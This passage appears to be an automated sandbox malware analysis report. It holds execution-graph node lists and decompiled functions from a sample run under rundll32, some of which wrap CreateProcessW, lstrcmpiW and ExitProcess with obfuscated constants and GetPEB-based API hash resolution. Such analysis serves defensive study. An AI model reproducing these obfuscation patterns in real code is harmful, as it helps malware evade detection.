33154c0 GetPEB 4902->4907 4905 33136ab 4905->4303 4907->4902 4907->4905 4908 3322eed GetPEB 4907->4908 4909 3326393 4907->4909 4913 331dd66 4907->4913 4918 332ae66 4907->4918 4908->4907 4910 33263af 4909->4910 4911 332e399 GetPEB 4910->4911 4912 3326451 4911->4912 4912->4907 4922 332afb0 4913->4922 4917 331def4 4917->4907 4919 332ae8b 4918->4919 4920 331dfb1 GetPEB 4919->4920 4921 332aea6 4920->4921 4921->4907 4923 332afcd 4922->4923 4924 332e399 GetPEB 4923->4924 4925 331de9f 4924->4925 4925->4917 4926 3318ac1 4925->4926 4927 3318af0 4926->4927 4928 332e399 GetPEB 4927->4928 4929 3318b80 4928->4929 4929->4917 4931 3318931 4930->4931 4932 332e399 GetPEB 4931->4932 4933 33189d2 4932->4933 4933->4316 4935 3321292 4934->4935 4936 332e399 GetPEB 4935->4936 4937 3321319 4936->4937 4937->4325 4939 33123c1 4938->4939 4940 331dfb1 GetPEB 4939->4940 4941 33123e7 4940->4941 4941->4337 4943 3330a28 4942->4943 4944 332e399 GetPEB 4943->4944 4945 3330ac6 4944->4945 4945->4343 4947 3324451 4946->4947 4948 332e399 GetPEB 4947->4948 4949 33244e1 4948->4949 4949->4343 4953 3320707 4950->4953 4951 3332a25 GetPEB 4951->4953 4952 3330ad3 GetPEB 4952->4953 4953->4951 4953->4952 4954 3312089 GetPEB 4953->4954 4956 3320818 4953->4956 4957 3322eed GetPEB 4953->4957 4962 3315d0c 4953->4962 4954->4953 4956->4343 4957->4953 4959 332885c 4958->4959 4960 332e399 GetPEB 4959->4960 4961 33288fc 4960->4961 4961->4345 4963 3315d1f 4962->4963 4964 332e399 GetPEB 4963->4964 4965 3315db4 4964->4965 4965->4953 4040 33118a3 4041 33118c5 4040->4041 4042 332e399 GetPEB 4041->4042 4043 3311960 4042->4043 4044 331f4a5 4045 331f593 4044->4045 4051 331f5d4 4045->4051 4052 33154c0 4045->4052 4053 33154d2 4052->4053 4064 3326f53 4053->4064 4056 3327634 4057 332764f 4056->4057 4058 331f5bc 4057->4058 4076 3327e14 4057->4076 4060 3322eed 4058->4060 4061 3322f00 4060->4061 4080 331f699 4061->4080 4069 331f5e0 4064->4069 4070 332e399 GetPEB 4069->4070 4071 331f690 4070->4071 4072 3324cfd 4071->4072 4073 3324d1c 4072->4073 4074 332e399 GetPEB 4073->4074 4075 3315556 4074->4075 4075->4056 4077 3327e2d 4076->4077 4078 332e399 GetPEB 4077->4078 4079 3327ece 4078->4079 4079->4057 4081 331f6b3 4080->4081 4082 331f5e0 GetPEB 4081->4082 4083 331f7d7 4082->4083 4086 331c460 4083->4086 4087 331c47b 4086->4087 4088 332e399 GetPEB 4087->4088 4089 331c519 4088->4089 4089->4051 5073 33147e4 5083 33147e7 5073->5083 5074 331e259 GetPEB 5074->5083 5075 33124aa GetPEB 5075->5083 5076 3314f37 5077 3320f17 GetPEB 5077->5083 5078 33306a6 GetPEB 5078->5083 5079 332cc3f GetPEB 5079->5083 5080 3322eed GetPEB 5080->5083 5081 3330ad3 GetPEB 5081->5083 5082 33306ef 2 API calls 5082->5083 5083->5074 5083->5075 5083->5076 5083->5077 5083->5078 5083->5079 5083->5080 5083->5081 5083->5082 5084 3333306 GetPEB 5083->5084 5084->5083 5196 3320fc5 5197 3320f17 GetPEB 5196->5197 5198 33211ee 5197->5198 5199 3320207 2 API calls 5198->5199 5200 3321206 5199->5200 5201 3321262 5200->5201 5202 3330ad3 GetPEB 5200->5202 5203 332121e 5202->5203 5204 33306a6 GetPEB 5203->5204 5205 3321242 5204->5205 5206 3322eed GetPEB 5205->5206 5207 3321251 5206->5207 5208 33155c0 GetPEB 5207->5208 5208->5201 4966 3325109 4972 3325118 4966->4972 4967 3313965 GetPEB 4967->4972 4969 3325691 4972->4967 4972->4969 4973 331f699 GetPEB 4972->4973 4974 3331c71 4972->4974 4984 332d5fe 4972->4984 5002 3320a37 4972->5002 4973->4972 4982 3331f68 4974->4982 4975 3317739 GetPEB 4975->4982 4976 3326f53 GetPEB 4976->4982 4977 33320d1 4979 331f699 GetPEB 4977->4979 4978 33320cf 4978->4972 4979->4978 4980 3330ad3 GetPEB 4980->4982 4981 331dfb1 GetPEB 4981->4982 4982->4975 4982->4976 4982->4977 4982->4978 4982->4980 4982->4981 4983 3322eed GetPEB 4982->4983 4983->4982 4995 332df78 4984->4995 4985 3326f53 GetPEB 4985->4995 4986 332e362 4989 331f699 GetPEB 4986->4989 4987 3330ad3 GetPEB 4987->4995 4988 33154c0 GetPEB 4988->4995 4990 332e1af 4989->4990 4990->4972 4991 332e14c 4994 33154c0 GetPEB 4991->4994 4992 331dfb1 GetPEB 4992->4995 4997 332e161 4994->4997 4995->4985 4995->4986 4995->4987 4995->4988 4995->4990 4995->4991 4995->4992 4996 3324626 GetPEB 4995->4996 4998 3322eed GetPEB 4995->4998 5014 331e20f 4995->5014 4996->4995 5010 332c103 4997->5010 4998->4995 5001 3322eed GetPEB 5001->4990 5006 3320a5f 5002->5006 5003 331f699 GetPEB 5003->5006 5005 3320f0a 5005->4972 5006->5003 5006->5005 5008 3326f53 GetPEB 5006->5008 5009 3324626 GetPEB 5006->5009 5018 3314f42 5006->5018 5024 33277a7 5006->5024 5008->5006 5009->5006 5011 332c11f 5010->5011 5012 331dfb1 GetPEB 5011->5012 5013 332c13d 5012->5013 5013->5001 5015 331e231 5014->5015 5016 331dfb1 GetPEB 5015->5016 5017 331e251 5016->5017 5017->4995 5019 3314f5f 5018->5019 5020 3315119 5019->5020 5023 3315117 5019->5023 5031 3330c66 5019->5031 5046 33167c8 5020->5046 5023->5006 5027 33277d6 5024->5027 5025 331938f GetPEB 5025->5027 5026 3327d01 5028 331f699 GetPEB 5026->5028 5027->5025 5027->5026 5029 3326f53 GetPEB 5027->5029 5030 3327ce7 5027->5030 5028->5030 5029->5027 5030->5006 5044 3330c99 5031->5044 5032 3330ad3 GetPEB 5032->5044 5035 3331955 5038 3312cf9 GetPEB 5035->5038 5036 3326f53 GetPEB 5036->5044 5037 3315894 GetPEB 5037->5044 5040 3331953 5038->5040 5039 331f699 GetPEB 5039->5044 5040->5019 5043 33192dd GetPEB 5043->5044 5044->5032 5044->5035 5044->5036 5044->5037 5044->5039 5044->5040 5044->5043 5045 3322eed GetPEB 5044->5045 5050 331ac44 5044->5050 5054 332c678 5044->5054 5058 333296f 5044->5058 5062 33136b6 5044->5062 5045->5044 5047 33167f7 5046->5047 5048 332e399 GetPEB 5047->5048 5049 3316892 5048->5049 5049->5023 5051 331ac66 5050->5051 5052 332e399 GetPEB 5051->5052 5053 331ad04 5052->5053 5053->5044 5055 332c69a 5054->5055 5056 332e399 GetPEB 5055->5056 5057 332c75e 5056->5057 5057->5044 5059 3332985 5058->5059 5060 332e399 GetPEB 5059->5060 5061 3332a19 5060->5061 5061->5044 5063 33136e6 5062->5063 5064 332e399 GetPEB 5063->5064 5065 331376d 5064->5065 5065->5044 5066 332670f 5067 3326950 5066->5067 5068 3326b58 5067->5068 5069 3326f53 GetPEB 5067->5069 5071 3320824 GetPEB 5067->5071 5072 3326b56 5067->5072 5070 3320824 GetPEB 5068->5070 5069->5067 5070->5072 5071->5067 4090 3313faf 4093 33144a9 4090->4093 4091 3330ad3 GetPEB 4091->4093 4092 33146e7 4118 3332a25 4092->4118 4093->4091 4093->4092 4096 33146e5 4093->4096 4098 331e259 GetPEB 4093->4098 4101 3322eed GetPEB 4093->4101 4102 331f14f 4093->4102 4106 33239e4 4093->4106 4110 332b062 4093->4110 4114 3312089 4093->4114 4098->4093 4101->4093 4103 331f166 4102->4103 4104 332e399 GetPEB 4103->4104 4105 331f201 4104->4105 4105->4093 4107 3323a0b 4106->4107 4108 332e399 GetPEB 4107->4108 4109 3323aa3 4108->4109 4109->4093 4111 332b08d 4110->4111 4112 331dfb1 GetPEB 4111->4112 4113 332b0b2 4112->4113 4113->4093 4115 33120bb 4114->4115 4116 332e399 GetPEB 4115->4116 4117 331215c 4116->4117 4117->4093 4119 3332a38 4118->4119 4120 332e399 GetPEB 4119->4120 4121 3332adb 4120->4121 4121->4096

                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 63 3329100-33291f6 call 3318002 call 332e399 CreateProcessW
                                                                                                                                                                                      C-Code - Quality: 41%
                                                                                                                                                                                      			E03329100(void* __ecx, WCHAR* __edx, WCHAR* _a8, struct _PROCESS_INFORMATION* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, struct _STARTUPINFOW* _a40, intOrPtr _a44, int _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                      				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                                                      				void* _t52;
                                                                                                                                                                                      				int _t60;
                                                                                                                                                                                      				WCHAR* _t64;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t64 = __edx;
                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                      				_push(_a64);
                                                                                                                                                                                      				_push(_a60);
                                                                                                                                                                                      				_push(_a56);
                                                                                                                                                                                      				_push(_a52);
                                                                                                                                                                                      				_push(_a48);
                                                                                                                                                                                      				_push(_a44);
                                                                                                                                                                                      				_push(_a40);
                                                                                                                                                                                      				_push(_a36);
                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                      				_push(_a28);
                                                                                                                                                                                      				_push(_a24);
                                                                                                                                                                                      				_push(_a20);
                                                                                                                                                                                      				_push(_a16);
                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                      				_push(_a8);
                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                      				_push(__edx);
                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                      				E03318002(_t52);
                                                                                                                                                                                      				_v28 = 0x2905a5;
                                                                                                                                                                                      				_v24 = 0;
                                                                                                                                                                                      				_v12 = 0xa2d8b8;
                                                                                                                                                                                      				_v12 = _v12 + 0xfffff871;
                                                                                                                                                                                      				_v12 = _v12 ^ 0x5b121ec8;
                                                                                                                                                                                      				_v12 = _v12 ^ 0x21b4fd5f;
                                                                                                                                                                                      				_v12 = _v12 ^ 0x7a067dbd;
                                                                                                                                                                                      				_v8 = 0x36027e;
                                                                                                                                                                                      				_v8 = _v8 ^ 0x6c06375b;
                                                                                                                                                                                      				_v8 = _v8 * 0x51;
                                                                                                                                                                                      				_v8 = _v8 + 0xffff0cdd;
                                                                                                                                                                                      				_v8 = _v8 ^ 0x3b3a0501;
                                                                                                                                                                                      				_v20 = 0x3133e6;
                                                                                                                                                                                      				_v20 = _v20 ^ 0xa81fc925;
                                                                                                                                                                                      				_v20 = _v20 ^ 0xa82b7027;
                                                                                                                                                                                      				_v16 = 0x47f0fa;
                                                                                                                                                                                      				_v16 = _v16 | 0xed8e49a9;
                                                                                                                                                                                      				_v16 = _v16 ^ 0xedcdbeb4;
                                                                                                                                                                                      				E0332E399(__ecx, __edx, __ecx, 0xa2449830, 0x53, 0xa9376bff);
                                                                                                                                                                                      				_t60 = CreateProcessW(_t64, _a8, 0, 0, _a48, 0, 0, 0, _a40, _a16); // executed
                                                                                                                                                                                      				return _t60;
                                                                                                                                                                                      			}












                                                                                                                                                                                      0x0332910a
                                                                                                                                                                                      0x0332910c
                                                                                                                                                                                      0x0332910d
                                                                                                                                                                                      0x0332910e
                                                                                                                                                                                      0x03329111
                                                                                                                                                                                      0x03329114
                                                                                                                                                                                      0x03329117
                                                                                                                                                                                      0x0332911a
                                                                                                                                                                                      0x0332911d
                                                                                                                                                                                      0x03329120
                                                                                                                                                                                      0x03329123
                                                                                                                                                                                      0x03329126
                                                                                                                                                                                      0x03329127
                                                                                                                                                                                      0x0332912a
                                                                                                                                                                                      0x0332912d
                                                                                                                                                                                      0x03329130
                                                                                                                                                                                      0x03329133
                                                                                                                                                                                      0x03329134
                                                                                                                                                                                      0x03329137
                                                                                                                                                                                      0x03329138
                                                                                                                                                                                      0x03329139
                                                                                                                                                                                      0x0332913a
                                                                                                                                                                                      0x0332913f
                                                                                                                                                                                      0x03329149
                                                                                                                                                                                      0x0332914c
                                                                                                                                                                                      0x03329153
                                                                                                                                                                                      0x0332915a
                                                                                                                                                                                      0x03329161
                                                                                                                                                                                      0x03329168
                                                                                                                                                                                      0x0332916f
                                                                                                                                                                                      0x03329176
                                                                                                                                                                                      0x0332918e
                                                                                                                                                                                      0x03329191
                                                                                                                                                                                      0x03329198
                                                                                                                                                                                      0x0332919f
                                                                                                                                                                                      0x033291a6
                                                                                                                                                                                      0x033291ad
                                                                                                                                                                                      0x033291b4
                                                                                                                                                                                      0x033291bb
                                                                                                                                                                                      0x033291c2
                                                                                                                                                                                      0x033291d5
                                                                                                                                                                                      0x033291ef
                                                                                                                                                                                      0x033291f6

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateProcessW.KERNELBASE(?,EDCDBEB4,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 033291EF
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.584033877.0000000003310000.00000040.00000010.sdmp, Offset: 03310000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3310000_rundll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                                      • String ID: 31
                                                                                                                                                                                      • API String ID: 963392458-1099231638
                                                                                                                                                                                      • Opcode ID: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
                                                                                                                                                                                      • Instruction ID: 1be61c2a06c6beecf1e1812ddf836a680b9ff3bf9ade921f7a42438248a898c1
                                                                                                                                                                                      • Opcode Fuzzy Hash: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B31E272801258BBCF559FA6CD45CDFBFB5FB89710F108158FA1462120C3728A60EBA1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 68 3320207-33202e8 call 3318002 call 332e399 lstrcmpiW
                                                                                                                                                                                      C-Code - Quality: 70%
                                                                                                                                                                                      			E03320207(void* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                      				void* _v32;
                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                      				void* _t54;
                                                                                                                                                                                      				int _t68;
                                                                                                                                                                                      				signed int _t70;
                                                                                                                                                                                      				signed int _t71;
                                                                                                                                                                                      				signed int _t72;
                                                                                                                                                                                      				WCHAR* _t81;
                                                                                                                                                                                      
                                                                                                                                                                                      				_push(_a16);
                                                                                                                                                                                      				_t81 = __edx;
                                                                                                                                                                                      				_push(_a12);
                                                                                                                                                                                      				_push(_a8);
                                                                                                                                                                                      				_push(_a4);
                                                                                                                                                                                      				_push(__edx);
                                                                                                                                                                                      				E03318002(_t54);
                                                                                                                                                                                      				_v36 = 0xa7e4f2;
                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                      				_t70 = 0x7b;
                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                      				_v12 = 0x53fdc4;
                                                                                                                                                                                      				_t71 = 0x5a;
                                                                                                                                                                                      				_v12 = _v12 / _t70;
                                                                                                                                                                                      				_v12 = _v12 << 7;
                                                                                                                                                                                      				_v12 = _v12 ^ 0xe1fe8b09;
                                                                                                                                                                                      				_v12 = _v12 ^ 0xe1ac8480;
                                                                                                                                                                                      				_v20 = 0x744728;
                                                                                                                                                                                      				_v20 = _v20 << 0xf;
                                                                                                                                                                                      				_v20 = _v20 ^ 0x239bcee7;
                                                                                                                                                                                      				_v16 = 0xd5199;
                                                                                                                                                                                      				_v16 = _v16 + 0xffff5a50;
                                                                                                                                                                                      				_v16 = _v16 / _t71;
                                                                                                                                                                                      				_v16 = _v16 ^ 0x000f59f5;
                                                                                                                                                                                      				_v8 = 0xa57c1a;
                                                                                                                                                                                      				_v8 = _v8 | 0x119c25df;
                                                                                                                                                                                      				_v8 = _v8 + 0xffffdcc6;
                                                                                                                                                                                      				_t72 = 0x4f;
                                                                                                                                                                                      				_v8 = _v8 / _t72;
                                                                                                                                                                                      				_v8 = _v8 ^ 0x003b1570;
                                                                                                                                                                                      				E0332E399(_t72, _v8 % _t72, _t72, 0xa2449830, 0x167, 0xa9a77114);
                                                                                                                                                                                      				_t68 = lstrcmpiW(_a8, _t81); // executed
                                                                                                                                                                                      				return _t68;
                                                                                                                                                                                      			}















                                                                                                                                                                                      0x0332020f
                                                                                                                                                                                      0x03320212
                                                                                                                                                                                      0x03320214
                                                                                                                                                                                      0x03320217
                                                                                                                                                                                      0x0332021a
                                                                                                                                                                                      0x0332021d
                                                                                                                                                                                      0x0332021f
                                                                                                                                                                                      0x03320224
                                                                                                                                                                                      0x03320232
                                                                                                                                                                                      0x03320235
                                                                                                                                                                                      0x03320238
                                                                                                                                                                                      0x03320239
                                                                                                                                                                                      0x0332023a
                                                                                                                                                                                      0x03320246
                                                                                                                                                                                      0x03320247
                                                                                                                                                                                      0x0332024c
                                                                                                                                                                                      0x03320250
                                                                                                                                                                                      0x03320257
                                                                                                                                                                                      0x0332025e
                                                                                                                                                                                      0x03320265
                                                                                                                                                                                      0x03320269
                                                                                                                                                                                      0x03320270
                                                                                                                                                                                      0x03320277
                                                                                                                                                                                      0x03320285
                                                                                                                                                                                      0x0332028a
                                                                                                                                                                                      0x03320291
                                                                                                                                                                                      0x03320298
                                                                                                                                                                                      0x0332029f
                                                                                                                                                                                      0x033202a9
                                                                                                                                                                                      0x033202af
                                                                                                                                                                                      0x033202b2
                                                                                                                                                                                      0x033202d5
                                                                                                                                                                                      0x033202e1
                                                                                                                                                                                      0x033202e8

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrcmpiW.KERNELBASE(000F59F5,00000000,?,?,?,?,?,?,?,9B842ACC,01B64447,00000000), ref: 033202E1
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.584033877.0000000003310000.00000040.00000010.sdmp, Offset: 03310000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3310000_rundll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcmpi
                                                                                                                                                                                      • String ID: (Gt
                                                                                                                                                                                      • API String ID: 1586166983-558867117
                                                                                                                                                                                      • Opcode ID: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
                                                                                                                                                                                      • Instruction ID: e50dac977b327209a88e814e4621654ce0f15f02bd2bfabdb39f7ef4c9a9415e
                                                                                                                                                                                      • Opcode Fuzzy Hash: bb735ff999d9414c3a9b564c67b10e962bbdffe1a82627d97bbaa383f4a39bdb
                                                                                                                                                                                      • Instruction Fuzzy Hash: B42166B5E00308FBEF04DFA4CC4A9DEBBB2FB44314F108199E515AA250D7B65A10DF90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 73 331f3f7-331f4a4 call 332e399 ExitProcess
                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                      			E0331F3F7() {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                      				signed int _v24;
                                                                                                                                                                                      				signed int _v28;
                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                      				signed int _t47;
                                                                                                                                                                                      
                                                                                                                                                                                      				_v28 = _v28 & 0x00000000;
                                                                                                                                                                                      				_v24 = _v24 & 0x00000000;
                                                                                                                                                                                      				_v36 = 0xb0bfd;
                                                                                                                                                                                      				_v32 = 0x231de0;
                                                                                                                                                                                      				_v20 = 0x822c7a;
                                                                                                                                                                                      				_t47 = 0x31;
                                                                                                                                                                                      				_push(_t47);
                                                                                                                                                                                      				_v20 = _v20 * 0x25;
                                                                                                                                                                                      				_v20 = _v20 ^ 0x12d3a120;
                                                                                                                                                                                      				_v12 = 0x122796;
                                                                                                                                                                                      				_v12 = _v12 | 0x5fffe7f7;
                                                                                                                                                                                      				_v12 = _v12 ^ 0x5ff36a5b;
                                                                                                                                                                                      				_v8 = 0xc53dc4;
                                                                                                                                                                                      				_v8 = _v8 + 0xffff669e;
                                                                                                                                                                                      				_v8 = _v8 + 0xba03;
                                                                                                                                                                                      				_v8 = _v8 + 0x1f9e;
                                                                                                                                                                                      				_v8 = _v8 ^ 0x00c2122b;
                                                                                                                                                                                      				_v16 = 0x5857ad;
                                                                                                                                                                                      				_v16 = _v16 / _t47;
                                                                                                                                                                                      				_v16 = _v16 ^ 0x000b8ebe;
                                                                                                                                                                                      				E0332E399(_t47, _v16 % _t47, _t47, 0xa2449830, 0x41, 0x9da8748a);
                                                                                                                                                                                      				ExitProcess(0);
                                                                                                                                                                                      			}












                                                                                                                                                                                      0x0331f3fd
                                                                                                                                                                                      0x0331f403
                                                                                                                                                                                      0x0331f407
                                                                                                                                                                                      0x0331f40e
                                                                                                                                                                                      0x0331f415
                                                                                                                                                                                      0x0331f422
                                                                                                                                                                                      0x0331f423
                                                                                                                                                                                      0x0331f429
                                                                                                                                                                                      0x0331f42c
                                                                                                                                                                                      0x0331f433
                                                                                                                                                                                      0x0331f43a
                                                                                                                                                                                      0x0331f441
                                                                                                                                                                                      0x0331f448
                                                                                                                                                                                      0x0331f44f
                                                                                                                                                                                      0x0331f456
                                                                                                                                                                                      0x0331f45d
                                                                                                                                                                                      0x0331f464
                                                                                                                                                                                      0x0331f46b
                                                                                                                                                                                      0x0331f479
                                                                                                                                                                                      0x0331f47c
                                                                                                                                                                                      0x0331f495
                                                                                                                                                                                      0x0331f49f

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 0331F49F
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.584033877.0000000003310000.00000040.00000010.sdmp, Offset: 03310000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3310000_rundll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                                                      • Opcode ID: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
                                                                                                                                                                                      • Instruction ID: 1b53ffb60b64185bd815336b53e36c54b98bc76765ba9428f1e79dbd1f40f291
                                                                                                                                                                                      • Opcode Fuzzy Hash: 03812332bf7814123334a19349d3f4d4ec07a23d3eba325336f5a23eb22f412d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 221106B1E1031DEBDF04DFE4C98AAEEBBB4FB14315F108188E521AA240E7B45B548F80
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                      Execution Coverage:4.1%
                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                      Total number of Nodes:1046
                                                                                                                                                                                      Total number of Limit Nodes:3

                                                                                                                                                                                      Graph

                                                                                                                                                                                      execution_graph 4040 2c70fc5 4053 2c70f17 4040->4053 4043 2c70207 2 API calls 4044 2c71206 4043->4044 4045 2c71262 4044->4045 4057 2c80ad3 4044->4057 4048 2c806a6 GetPEB 4049 2c71242 4048->4049 4061 2c72eed 4049->4061 4054 2c70f2d 4053->4054 4055 2c7e399 GetPEB 4054->4055 4056 2c70fb9 4055->4056 4056->4043 4058 2c80ae6 4057->4058 4069 2c76f53 4058->4069 4062 2c72f00 4061->4062 4081 2c6f699 4062->4081 4065 2c655c0 4066 2c655d3 4065->4066 4067 2c7e399 GetPEB 4066->4067 4068 2c65674 4067->4068 4068->4045 4074 2c6f5e0 4069->4074 4075 2c7e399 GetPEB 4074->4075 4076 2c6f690 4075->4076 4077 2c74cfd 4076->4077 4078 2c74d1c 4077->4078 4079 2c7e399 GetPEB 4078->4079 4080 2c7121e 4079->4080 4080->4048 4082 2c6f6b3 4081->4082 4083 2c6f5e0 GetPEB 4082->4083 4084 2c6f7d7 4083->4084 4087 2c6c460 4084->4087 4088 2c6c47b 4087->4088 4089 2c7e399 GetPEB 4088->4089 4090 2c6c519 4089->4090 4090->4065 4261 2c647e4 4264 2c647e7 4261->4264 4262 2c6e259 GetPEB 4262->4264 4263 2c624aa GetPEB 4263->4264 4264->4262 4264->4263 4265 2c64f37 4264->4265 4266 2c70f17 GetPEB 4264->4266 4268 2c72eed GetPEB 4264->4268 4269 2c80ad3 GetPEB 4264->4269 4270 2c806ef 2 API calls 4264->4270 4271 2c806a6 GetPEB 4264->4271 4273 2c7cc3f 4264->4273 4277 2c83306 4264->4277 4266->4264 4268->4264 4269->4264 4270->4264 4271->4264 4274 2c7cc53 4273->4274 4284 2c6c52a 4274->4284 4276 2c7cd63 4276->4264 4280 2c83327 4277->4280 4279 2c72d06 GetPEB 4279->4280 4280->4279 4281 2c83543 4280->4281 4282 2c83555 4280->4282 4287 2c74c43 4280->4287 4283 2c79038 GetPEB 4281->4283 4282->4264 4283->4282 4285 2c7e399 GetPEB 4284->4285 4286 2c6c5d1 4285->4286 4286->4276 4288 2c74c66 4287->4288 4289 2c7e399 GetPEB 4288->4289 4290 2c74ce6 4289->4290 4290->4280 5173 2c6f4a5 5174 2c6f593 5173->5174 5175 2c654c0 GetPEB 5174->5175 5180 2c6f5d4 5174->5180 5176 2c6f5a8 5175->5176 5181 2c77634 5176->5181 5179 2c72eed GetPEB 5179->5180 5182 2c7764f 5181->5182 5183 2c6f5bc 5182->5183 5185 2c77e14 5182->5185 5183->5179 5186 2c77e2d 5185->5186 5187 2c7e399 GetPEB 5186->5187 5188 2c77ece 5187->5188 5188->5182 4291 2c79902 4318 2c7a564 4291->4318 4292 2c7ae1e 4494 2c6b12e 4292->4494 4300 2c660ba GetPEB 4300->4318 4301 2c7ae1c 4305 2c7ae52 4504 2c7c772 4305->4504 4313 2c6f699 GetPEB 4313->4318 4314 2c78518 GetPEB 4314->4318 4318->4292 4318->4300 4318->4301 4318->4305 4318->4313 4318->4314 4324 2c72eed GetPEB 4318->4324 4325 2c65dc3 4318->4325 4333 2c6f022 4318->4333 4337 2c827e2 4318->4337 4342 2c80bf1 4318->4342 4345 2c73abe 4318->4345 4358 2c6635f 4318->4358 4363 2c837b6 4318->4363 4367 2c76b91 4318->4367 4375 2c756a9 4318->4375 4385 2c82d4f 4318->4385 4394 2c62176 4318->4394 4401 2c61df9 4318->4401 4407 2c7e7da 4318->4407 4415 2c7ba18 4318->4415 4426 2c639c3 4318->4426 4437 2c6196d 4318->4437 4447 2c68d59 4318->4447 4456 2c74268 4318->4456 4460 2c7ce94 4318->4460 4463 2c7c145 4318->4463 4467 2c7aeae 4318->4467 4472 2c789da 4318->4472 4483 2c68112 4318->4483 4324->4318 4326 2c65ddb 4325->4326 4327 2c6f699 GetPEB 4326->4327 4330 2c65fed 4326->4330 4332 2c76f53 GetPEB 4326->4332 4519 2c6bef5 4326->4519 4529 2c72f8c 4326->4529 4533 2c7469a 4326->4533 4327->4326 4330->4318 4332->4326 4335 2c6f03c 4333->4335 4334 2c62b7c GetPEB 4334->4335 4335->4334 4336 2c6f14a 4335->4336 4336->4318 4635 2c68cbc 4337->4635 4343 2c76f53 GetPEB 4342->4343 4344 2c80c53 4343->4344 4344->4318 4356 2c73ffe 4345->4356 4347 2c80ad3 GetPEB 4347->4356 4349 2c74243 4350 2c67cc1 GetPEB 4349->4350 4352 2c74241 4350->4352 4352->4318 4354 2c6e259 GetPEB 4354->4356 4355 2c7b062 GetPEB 4355->4356 4356->4347 4356->4349 4356->4352 4356->4354 4356->4355 4357 2c72eed GetPEB 4356->4357 4642 2c67cc1 4356->4642 4646 2c7e606 4356->4646 4650 2c73130 4356->4650 4663 2c83231 4356->4663 4357->4356 4360 2c6647f 4358->4360 4361 2c6654a 4360->4361 4683 2c6d730 4360->4683 4687 2c828a6 4360->4687 4361->4318 4364 2c837cf 4363->4364 4365 2c7e399 GetPEB 4364->4365 4366 2c8384d 4365->4366 4366->4318 4370 2c76d84 4367->4370 4369 2c80ad3 GetPEB 4369->4370 4370->4369 4371 2c76e5e 4370->4371 4372 2c70f17 